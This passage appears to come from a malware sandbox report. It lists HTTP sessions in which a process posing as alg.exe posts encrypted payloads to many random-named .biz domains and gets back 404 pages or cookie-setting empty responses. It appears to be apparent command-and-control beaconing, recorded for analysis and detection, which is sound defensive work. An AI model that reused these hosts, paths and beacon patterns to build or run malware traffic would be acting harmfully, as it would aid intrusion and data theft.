(Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 28, 2024 06:43:08.535788059 CET	355	OUT	POST /qborytaxfey HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gytujflc.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:08.535844088 CET	778	OUT	Data Raw: 8a 55 03 bb 7a f8 fb 6a fe 02 00 00 bb 16 1a b3 f4 7c b2 9a e6 e5 85 8e 4f a5 ed 54 af b7 47 2e 89 be f6 e8 78 4f fd 30 30 9b 77 19 65 e7 00 1b 27 a0 16 94 ca 90 df 25 80 c3 a2 c5 fa e9 e9 41 7f b5 a8 78 a3 66 f3 f5 d2 56 02 c7 ad 9e 24 53 80 85 Data Ascii: Uzj\|OTG.xO00we'%AxfV$SH\|[Vzqua14[nR.)QS/v7F4w_hY@&n-~emIdwR7sel(g_9ME(vle"=Z)33z*\^8U2={Y#}
Nov 28, 2024 06:43:08.873482943 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Thu, 28 Nov 2024 05:43:08 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49904	13.251.16.150	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:43:09.503041983 CET	345	OUT	POST /nrq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: qaynky.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:09.503060102 CET	778	OUT	Data Raw: 96 e7 89 57 7c 4c 50 58 fe 02 00 00 61 b9 aa 32 3e a6 e8 4c 97 bb b8 ff 6e 48 fe 70 34 81 fc 54 e0 60 cd 89 a1 48 f5 44 8b 6b c5 65 29 47 8c 94 4d 81 62 28 c9 f3 00 3b b7 ed ea 93 ac 3e bd dc 0f 36 b6 91 c4 de d2 f9 76 fb e3 59 43 a9 39 b9 37 7b Data Ascii: W\|LPXa2>LnHp4T`HDke)GMb(;>6vYC97{tNQ 0:S,/-!\LJGM=)~o:M[XSh*#u34RR-+-Kr/w+/WrimxlKxm\j&O~,6D
Nov 28, 2024 06:43:11.524255037 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:43:11 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=8fdab72ea9e049c01fd099390cc701a3\|8.46.123.228\|1732772591\|1732772591\|0\|1\|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49907	44.221.84.105	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:43:12.161953926 CET	361	OUT	POST /douphuxkjsfcbawq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: bumxkqgxu.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:12.161983967 CET	778	OUT	Data Raw: 8f 3f 2b 22 f8 6e 98 2d fe 02 00 00 c0 27 b6 27 77 51 c6 03 8f 1a 8a a8 57 b4 3c 0e 25 e0 81 c0 d4 7c b2 c3 dc bd 5b ef a6 fb ba 58 da cc 7f 93 06 fd 1e 19 63 f3 20 e5 03 97 b3 81 ce 50 4f 3a 2c b6 83 50 67 16 78 1d 05 3a 4c e3 15 5a 20 4d 61 13 Data Ascii: ?+"n-''wQW<%\|[Xc PO:,Pgx:LZ Ma&S3.0'%_{YGZs2R6j<Hlv2zQnrgdsrw)Kz~zj8 G)j\ezd0R
Nov 28, 2024 06:43:13.356466055 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:43:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=c064c3fb9233923f88342025ac98c06c\|8.46.123.228\|1732772593\|1732772593\|0\|1\|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49908	54.244.188.177	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:43:13.970741034 CET	352	OUT	POST /xfxdrndh HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: dwrqljrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:13.970741034 CET	778	OUT	Data Raw: f7 36 5f 26 41 0b 0a e9 fe 02 00 00 3c 90 80 44 53 c4 68 d5 58 b6 ee 0a 8a 76 34 94 c0 67 63 71 68 7d f7 d5 ca 39 7c 1c 2f 66 be 93 7e 7a 2e 12 11 c4 4d 05 3d bd b0 8d 37 27 46 3d 37 d2 16 61 f8 98 55 78 c2 cd ee 6d 24 1c c9 a2 3c 55 d5 14 23 13 Data Ascii: 6_&A<DShXv4gcqh}9\|/f~z.M=7'F=7aUxm$<U#g(PfDqd.b`u#aFjxpfGI'>}5%e&#<7qeO?<*\|'7<T.)uf_h~\0sVKsy+`WrcU=%[!)^Um-T]^BXC/V
Nov 28, 2024 06:43:15.430035114 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:43:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=c85d8096539ff22538e39a6cc7c895ad\|8.46.123.228\|1732772595\|1732772595\|0\|1\|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49909	35.164.78.200	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:43:16.058494091 CET	352	OUT	POST /vnerdykqwl HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: nqwjmb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:16.058532000 CET	778	OUT	Data Raw: f9 39 13 68 b0 32 0b 12 fe 02 00 00 48 af c7 0e 50 ef d5 36 40 1b f9 89 d6 cf 07 02 46 ee 85 29 e1 41 38 e1 ae a4 1a c9 30 5a 7f b2 55 81 6f 6e 6a aa be 1d 13 94 cc a4 e5 e6 72 b2 b5 2e 04 c1 25 95 10 b1 34 a8 59 83 0a 98 a6 8b 6f fa ae c5 c1 14 Data Ascii: 9h2HP6@F)A80ZUonjr.%4Yo^hbFj&LzkMtib9yUmR@]($Lz/gw$%FnTxD6@Z=.MkB^[_Su84V(@fN
Nov 28, 2024 06:43:17.419086933 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:43:17 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=e926ae57acff33fb46f16a3c9fc43b98\|8.46.123.228\|1732772597\|1732772597\|0\|1\|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49910	3.94.10.34	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:43:18.047890902 CET	361	OUT	POST /acnoqimrskbkvnwq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ytctnunms.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:18.047915936 CET	778	OUT	Data Raw: 93 c6 c4 f5 14 15 ab 0b fe 02 00 00 a2 fe e8 e9 a4 33 9f da f9 de 81 a7 3e 92 ce f1 51 89 bf 10 77 f5 31 46 65 11 bc 9e 79 73 6c 06 05 11 9d c4 00 ec d3 50 d5 35 52 70 32 d5 b3 0f 30 af 2d c2 1c c4 f9 73 e4 0b 2a 09 ca ca 86 a7 81 d0 4a 28 cd f8 Data Ascii: 3>Qw1FeyslP5Rp20-s*J(Y@tqwkl+^F<{;\)WDy1+#vcH\CJ?_%9"N:/x+UPFg9hI/\,@{\|vDl>e,(
Nov 28, 2024 06:43:19.147612095 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:43:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=d1f9ec6dc1896fd99dfebdd3a94b5262\|8.46.123.228\|1732772598\|1732772598\|0\|1\|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49911	165.160.15.20	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:43:19.677129984 CET	348	OUT	POST /dxskhpn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: myups.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:19.677148104 CET	778	OUT	Data Raw: ca 28 7b 6e 41 6c f0 8a fe 02 00 00 7b d5 00 8b 98 4e f4 93 07 1e af c1 44 72 6e 67 cd 50 96 c3 9d 72 0d e3 42 c8 77 02 a4 1c c4 76 35 b7 82 b1 7b 7e 4f 84 cc e7 47 ae 7d 5e 7b a6 7d 89 22 3b 6f cc 0d f5 a4 9b da 44 e2 b9 20 f0 fa 24 40 1d dc 72 Data Ascii: ({nAl{NDrngPrBwv5{~OG}^{}";oD $@r7xruDpwD^br9"g`b=;X wx7/c.zOxC3=x3'/+rXf"M$hQ7J3&c?J"A9L0aqxF}UAF
Nov 28, 2024 06:43:20.934308052 CET	170	IN	HTTP/1.1 200 OK Date: Thu, 28 Nov 2024 05:43:20 GMT Content-Length: 94 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
Nov 28, 2024 06:43:20.939409971 CET	351	OUT	POST /mghrypnodi HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: myups.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:20.939459085 CET	778	OUT	Data Raw: 89 a1 21 b4 76 ae bb eb fe 02 00 00 13 6e e0 ee c5 1c 21 99 d8 1a af fe 4e 04 9b 10 a2 dd 57 94 d6 e1 e4 4c cb 0a 18 85 df 02 46 c6 ff 21 3e 48 f6 49 02 7f 5c 03 8b 26 fe 59 6d 8c e7 5f 22 61 c8 af 7e b4 0f d0 d3 15 b1 bc 46 7c 0e ae 18 fb 22 12 Data Ascii: !vn!NWLF!>HI\&Ym_"a~F\|"wGt?vJ\'wcp;foDxSu\$*!Bm;r?O6kJh0wol@qvR=Je!Li$b1>h/<J1O=GQd&O
Nov 28, 2024 06:43:21.343549013 CET	95	IN	HTTP/1.1 200 OK Date: Thu, 28 Nov 2024 05:43:21 GMT Content-Length: 94 Connection: close
Nov 28, 2024 06:43:21.393697977 CET	94	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49912	54.244.188.177	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:43:22.253714085 CET	350	OUT	POST /knkyl HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: oshhkdluh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:22.253879070 CET	778	OUT	Data Raw: f8 5f a2 64 ae 8d 6b 52 fe 02 00 00 94 dd 0f 1f f9 20 9c b8 2c b9 7b e6 59 c1 96 24 60 c3 df d2 ed c5 6a 61 e1 82 0e 68 5b 0d 03 39 b1 57 35 4a 61 50 db 59 3c 41 7c fb 1c 98 61 58 00 a6 de bb a6 7d 4e 63 55 a7 62 3a 15 e1 69 45 7e 17 7a a1 c9 51 Data Ascii: _dkR ,{Y$`jah[9W5JaPY<A\|aX}NcUb:iE~zQ8"#,A_fCSKn(2.$@hNXQ2'7Fq4pwwF!? N{JOVrmJU]-k8'vi.&ht.+\|QVd.3
Nov 28, 2024 06:43:23.621820927 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:43:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=ff7b0018b26f5389e11f219512c60bc4\|8.46.123.228\|1732772603\|1732772603\|0\|1\|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49914	208.100.26.245	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:43:24.456533909 CET	345	OUT	POST /wo HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yunalwv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:24.456543922 CET	778	OUT	Data Raw: f7 65 8e a7 d2 5d 44 ea fe 02 00 00 ed 19 01 5c 9e ff dc bf 9d cd 7a 46 0a 27 22 42 14 df a6 52 13 b5 9f 09 68 c3 d0 2b 22 6a a3 3a a2 62 20 fd e1 8a bc 79 44 ea 12 e2 3b a3 02 f8 59 dc 4c 57 30 23 24 34 16 bb e4 17 99 52 1b 0c 51 77 3d 8d 55 20 Data Ascii: e]D\zF'"BRh+"j:b yD;YLW0#$4RQw=U z:u}#42?PKq/XZiWb,E+!J"gv2kijd4~P/hZjL<0(9J!yc\KcTLFk
Nov 28, 2024 06:43:25.581556082 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Thu, 28 Nov 2024 05:43:25 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 28, 2024 06:43:25.584053040 CET	344	OUT	POST /x HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yunalwv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:25.584095955 CET	778	OUT	Data Raw: 50 4e f7 01 00 1e 29 c4 fe 02 00 00 c2 37 73 6b a1 2c 00 84 ef 5a 4d ec 63 ad bd 3b 75 df c3 91 d3 d5 82 f7 f9 da 0d 76 80 ce 00 a9 51 b6 41 9e ce d4 95 8d ea 7d 9b e5 50 22 99 7a 94 91 2e 5d b0 f5 7a 17 a9 eb 2f 7e 4b 8b 85 53 b2 78 1d 1a 9c d6 Data Ascii: PN)7sk,ZMc;uvQA}P"z.]z/~KSxJs}Y~[rpO+udfI^~N(pX8tabXe]1S*-lUe}Hm,u+WeARbv\|KNX aCCj@s_o/cuGZ9:
Nov 28, 2024 06:43:25.964538097 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Thu, 28 Nov 2024 05:43:25 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49915	18.246.231.120	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:43:26.601167917 CET	350	OUT	POST /xkeryphtb HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jpskm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:26.601336956 CET	778	OUT	Data Raw: 3e a2 d2 5d d8 c2 e4 0d fe 02 00 00 78 c2 f4 1e d2 fc 02 6c 6f 81 fc a9 a7 10 f8 92 ca 5b 69 01 53 e4 00 41 19 68 30 92 8e 26 05 cf 45 f3 09 59 0a 79 08 85 a5 57 97 b0 d5 cd c2 26 41 c4 de ef 37 3f cd f2 91 e5 08 a1 b7 3a 43 67 52 94 03 0e 8f 58 Data Ascii: >]xlo[iSAh0&EYyW&A7?:CgRXqxBf]ij66Alw($9KHe1X)m,6L-SV]nIH-L(fHiNWPy~NB&107qxI& 07[*
Nov 28, 2024 06:43:28.092088938 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:43:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=6b90425011d2580864b3dab30c0c1d5d\|8.46.123.228\|1732772607\|1732772607\|0\|1\|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49917	54.244.188.177	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:43:28.700248957 CET	360	OUT	POST /jbjdkjesppdqiqdm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lrxdmhrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:28.700268030 CET	778	OUT	Data Raw: 3f a4 86 9f 47 e9 e6 36 fe 02 00 00 9f 84 bf 9d 85 bc 60 8c cb 6d f3 74 90 27 b2 bf 89 91 06 2e d1 e8 c9 f0 5c 62 68 96 4b ed f9 1d 97 c7 cb f5 55 aa d0 4f 8a f0 d2 64 d3 98 d7 25 90 93 d0 c9 2c b1 ab 58 71 7b 79 1a fb d3 f4 36 11 6c cd 69 1d 8d Data Ascii: ?G6`mt'.\bhKUOd%,Xq{y6li~o`#a{[Vd5,>!Az^3V]3}\:KMQC0xT22]ul=pkf(xvH4(*61#AF5$<!n
